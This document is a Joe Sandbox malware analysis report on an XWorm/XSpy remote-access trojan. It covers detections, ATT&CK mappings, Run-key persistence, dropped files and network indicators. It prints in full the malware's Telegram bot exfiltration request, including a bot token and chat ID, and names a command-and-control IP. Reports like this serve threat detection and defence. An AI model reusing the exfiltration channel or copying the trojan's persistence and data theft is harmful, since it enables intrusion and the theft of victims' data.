Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\XClient.exe	Queries volume information: C:\Users\user\AppData\Roaming\XClient.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\XClient.exe	Queries volume information: C:\Users\user\AppData\Roaming\XClient.exe VolumeInformation

Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: z0LTqIdZ4A.exe, 00000000.00000002.2937210642.000000001B8E6000.00000004.00000020.00020000.00000000.sdmp, z0LTqIdZ4A.exe, 00000000.00000002.2937210642.000000001B8BB000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

Yara detected XWorm

Source: Yara match	File source: z0LTqIdZ4A.exe, type: SAMPLE
Source: Yara match	File source: 0.2.z0LTqIdZ4A.exe.12be9ac0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.z0LTqIdZ4A.exe.8e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.z0LTqIdZ4A.exe.12be9ac0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2929213557.0000000002C93000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2929213557.0000000002C4D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.1655732431.00000000008E2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2935208445.0000000012BE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: z0LTqIdZ4A.exe PID: 6520, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\XClient.exe, type: DROPPED

Remote Access Functionality

Yara detected XWorm

Source: Yara match	File source: z0LTqIdZ4A.exe, type: SAMPLE
Source: Yara match	File source: 0.2.z0LTqIdZ4A.exe.12be9ac0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.z0LTqIdZ4A.exe.8e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.z0LTqIdZ4A.exe.12be9ac0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2929213557.0000000002C93000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2929213557.0000000002C4D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.1655732431.00000000008E2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2935208445.0000000012BE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: z0LTqIdZ4A.exe PID: 6520, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\XClient.exe, type: DROPPED

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	11 Windows Management Instrumentation	21 Registry Run Keys / Startup Folder	12 Process Injection	11 Masquerading	OS Credential Dumping	221 Security Software Discovery	Remote Services	11 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 PowerShell	1 DLL Side-Loading	21 Registry Run Keys / Startup Folder	11 Disable or Modify Tools	LSASS Memory	2 Process Discovery	Remote Desktop Protocol	1 Clipboard Data	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	131 Virtualization/Sandbox Evasion	Security Account Manager	131 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	12 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	1 Ingress Tool Transfer	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	2 Non-Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	11 Obfuscated Files or Information	Cached Domain Credentials	13 System Information Discovery	VNC	GUI Input Capture	13 Application Layer Protocol	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	2 Software Packing	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
z0LTqIdZ4A.exe	84%	ReversingLabs	ByteCode-MSIL.Backdoor.XWorm
z0LTqIdZ4A.exe	82%	Virustotal		Browse
z0LTqIdZ4A.exe	100%	Avira	HEUR/AGEN.1352371
z0LTqIdZ4A.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\XClient.exe	100%	Avira	HEUR/AGEN.1352371
C:\Users\user\AppData\Roaming\XClient.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\XClient.exe	84%	ReversingLabs	ByteCode-MSIL.Backdoor.XWorm
C:\Users\user\AppData\Roaming\XClient.exe	82%	Virustotal		Browse

Source	Detection	Scanner	Label	Link
http://pesterbdd.com/images/Pester.png	100%	URL Reputation	malware
https://contoso.com/	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
http://schemas.microsoft.co	1%	Virustotal		Browse
http://www.microsoft.co	1%	Virustotal		Browse
93.123.39.225	20%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
api.telegram.org	149.154.167.220	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://api.telegram.org/bot6769459273:AAE8rusUI57P-Uj11j60b70AidMpGMPPq1E/sendMessage?chat_id=6862736136&text=%E2%98%A0%20%5BXSPY%20-%20@RUSSAGENT%20%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AFF6BC8E90A1001FE1454%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%206Z46G%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XSpy%20By%20EagleSpy	false		high
93.123.39.225	true	20%, Virustotal, Browse	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://nuget.org/NuGet.exe	powershell.exe, 00000001.00000002.1719420293.000001EFD1E02000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1807558417.0000017B42B62000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1955490947.000001F710072000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2211113684.000001DFC4540000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot6769459273:AAE8rusUI57P-Uj11j60b70AidMpGMPPq1E/sendMessage?chat_id=68627	z0LTqIdZ4A.exe, 00000000.00000002.2929213557.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org	z0LTqIdZ4A.exe, 00000000.00000002.2929213557.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, z0LTqIdZ4A.exe, 00000000.00000002.2929213557.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 0000000B.00000002.2048675831.000001DFB46FA000.00000004.00000800.00020000.00000000.sdmp	true	URL Reputation: malware	unknown
http://www.microsoft.t	powershell.exe, 00000001.00000002.1726113566.000001EFDA3E0000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://api.telegram.org/bot	z0LTqIdZ4A.exe, XClient.exe.0.dr	false		high
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000001.00000002.1700953818.000001EFC1FB9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1752240202.0000017B32D18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1869095239.000001F700228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2048675831.000001DFB46FA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 0000000B.00000002.2048675831.000001DFB46FA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000001.00000002.1700953818.000001EFC1FB9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1752240202.0000017B32D18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1869095239.000001F700228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2048675831.000001DFB46FA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/	powershell.exe, 0000000B.00000002.2211113684.000001DFC4540000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000001.00000002.1719420293.000001EFD1E02000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1807558417.0000017B42B62000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1955490947.000001F710072000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2211113684.000001DFC4540000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.microsoft.co	powershell.exe, 00000007.00000002.2000377397.000001F76D908000.00000004.00000020.00020000.00000000.sdmp	false	1%, Virustotal, Browse	unknown
https://api.telegrP	z0LTqIdZ4A.exe, 00000000.00000002.2929213557.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://contoso.com/License	powershell.exe, 0000000B.00000002.2211113684.000001DFC4540000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/Icon	powershell.exe, 0000000B.00000002.2211113684.000001DFC4540000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://aka.ms/pscore68	powershell.exe, 00000001.00000002.1700953818.000001EFC1D91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1752240202.0000017B32AF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1869095239.000001F700001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2048675831.000001DFB44D1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ion=v4.5n	powershell.exe, 00000007.00000002.2000377397.000001F76D919000.00000004.00000020.00020000.00000000.sdmp	false		low
http://api.telegram.org	z0LTqIdZ4A.exe, 00000000.00000002.2929213557.0000000002CDA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	z0LTqIdZ4A.exe, 00000000.00000002.2929213557.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1700953818.000001EFC1D91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1752240202.0000017B32AF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1869095239.000001F700001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2048675831.000001DFB44D1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.microsoft.co	powershell.exe, 00000004.00000002.1838173359.0000017B4B064000.00000004.00000020.00020000.00000000.sdmp	false	1%, Virustotal, Browse	unknown
https://github.com/Pester/Pester	powershell.exe, 0000000B.00000002.2048675831.000001DFB46FA000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
149.154.167.220	api.telegram.org	United Kingdom		62041	TELEGRAMRU	false
93.123.39.225	unknown	Bulgaria		43561	NET1-ASBG	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1429112
Start date and time:	2024-04-20 23:39:08 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 15s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	16
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	z0LTqIdZ4A.exe renamed because original name is a hash value
Original Sample Name:	67183ea2fdfbaace4c265de91e218c59.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@15/20@1/2
EGA Information:	Successful, ratio: 14.3%
HCA Information:	Successful, ratio: 99% Number of executed functions: 63 Number of non-executed functions: 9
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target XClient.exe, PID 2080 because it is empty
Execution Graph export aborted for target XClient.exe, PID 5344 because it is empty
Execution Graph export aborted for target powershell.exe, PID 6184 because it is empty
Execution Graph export aborted for target powershell.exe, PID 7220 because it is empty
Execution Graph export aborted for target powershell.exe, PID 7556 because it is empty
Execution Graph export aborted for target powershell.exe, PID 7884 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
22:41:01	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run XClient C:\Users\user\AppData\Roaming\XClient.exe
22:41:10	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run XClient C:\Users\user\AppData\Roaming\XClient.exe
22:41:18	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk
23:39:59	API Interceptor	260x Sleep call for process: z0LTqIdZ4A.exe modified
23:40:00	API Interceptor	52x Sleep call for process: powershell.exe modified
23:41:10	API Interceptor	2x Sleep call for process: XClient.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
149.154.167.220	z1E-catalogSamples.exe	Get hash	malicious	AgentTesla	Browse
	W4tW72sfAD.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	s.exe	Get hash	malicious	Unknown	Browse
	s.exe	Get hash	malicious	Unknown	Browse
	DHL.exe	Get hash	malicious	AgentTesla	Browse
	Sp#U251c#U0434ti.exe	Get hash	malicious	DanaBot	Browse
	Sp#U251c#U0434ti.exe	Get hash	malicious	Unknown	Browse
	s.exe	Get hash	malicious	Unknown	Browse
	pQTmpNQX2u.exe	Get hash	malicious	DCRat	Browse
	Sp#U251c#U0434ti.exe	Get hash	malicious	Unknown	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
api.telegram.org	z1E-catalogSamples.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	W4tW72sfAD.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	149.154.167.220
	s.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	s.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	DHL.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	Sp#U251c#U0434ti.exe	Get hash	malicious	DanaBot	Browse	149.154.167.220
	Sp#U251c#U0434ti.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	s.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	pQTmpNQX2u.exe	Get hash	malicious	DCRat	Browse	149.154.167.220
	Sp#U251c#U0434ti.exe	Get hash	malicious	Unknown	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	z1E-catalogSamples.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	W4tW72sfAD.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	149.154.167.220
	s.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	s.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	DHL.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	Sp#U251c#U0434ti.exe	Get hash	malicious	DanaBot	Browse	149.154.167.220
	Sp#U251c#U0434ti.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	s.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	New Soft Update.exe	Get hash	malicious	Unknown	Browse	149.154.167.99
	pQTmpNQX2u.exe	Get hash	malicious	DCRat	Browse	149.154.167.220
NET1-ASBG	rOferta_SKGNMECLemnedefinitionen353523577.wsf	Get hash	malicious	GuLoader, Remcos	Browse	87.121.105.163
	xnNcI6OenKJs.exe	Get hash	malicious	Quasar	Browse	94.156.79.26
	Ordine_doc_419024001904.bat	Get hash	malicious	FormBook, GuLoader	Browse	87.121.105.163
	AWB DOCUMENT.vbs	Get hash	malicious	GuLoader, Remcos	Browse	87.121.105.184
	85x5rW00VC.elf	Get hash	malicious	Gafgyt	Browse	93.123.85.170
	xSvRIB2B2i.elf	Get hash	malicious	Gafgyt	Browse	93.123.85.170
	HnDIabQLxo.elf	Get hash	malicious	Gafgyt	Browse	93.123.85.170
	P6VjwulCEv.elf	Get hash	malicious	Gafgyt	Browse	93.123.85.170
	S7AqbuIfHT.elf	Get hash	malicious	Gafgyt	Browse	93.123.85.170
	higf1frmKz.elf	Get hash	malicious	Gafgyt	Browse	93.123.85.170

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	KvS2rT08PQ.exe	Get hash	malicious	Blank Grabber, Njrat, Umbral Stealer	Browse	149.154.167.220
	2M1NS61GG8.exe	Get hash	malicious	LummaC, DarkTortilla, LummaC Stealer, PureLog Stealer, RedLine, zgRAT	Browse	149.154.167.220
	Receipt_7814002.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	149.154.167.220
	fP4kybhBWi.exe	Get hash	malicious	Quasar	Browse	149.154.167.220
	VN24A02765.PDF.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	ShippingOrder_ GSHS2400052.exe	Get hash	malicious	AgentTesla, PureLog Stealer, zgRAT	Browse	149.154.167.220
	SecuriteInfo.com.Win32.PWSX-gen.25825.12964.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	0OqTUkeaoD.exe	Get hash	malicious	RedLine	Browse	149.154.167.220
	IMG_210112052.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	149.154.167.220
	https://keenetownhall-my.sharepoint.com/:b:/g/personal/amanda_keenetownhall_org/ESKbqbSIMj5ElsbdsfaEg7oBgkFm5H_JqS97uaySzVhJDQ?e=KMMz4y	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220

Process:	C:\Users\user\AppData\Roaming\XClient.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	654
Entropy (8bit):	5.380476433908377
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
MD5:	30E4BDFC34907D0E4D11152CAEBE27FA
SHA1:	825402D6B151041BA01C5117387228EC9B7168BF
SHA-256:	A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
SHA-512:	89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Reputation:	high, very likely benign file
Preview:	@...e...........................................................

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2srbw2cv.5rt.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4zll2czj.ujz.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_amf3b1ux.vy5.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cqaufyng.uzk.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fltctdoq.e5x.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hmvaauh3.w50.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kdtwnbtm.gf3.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
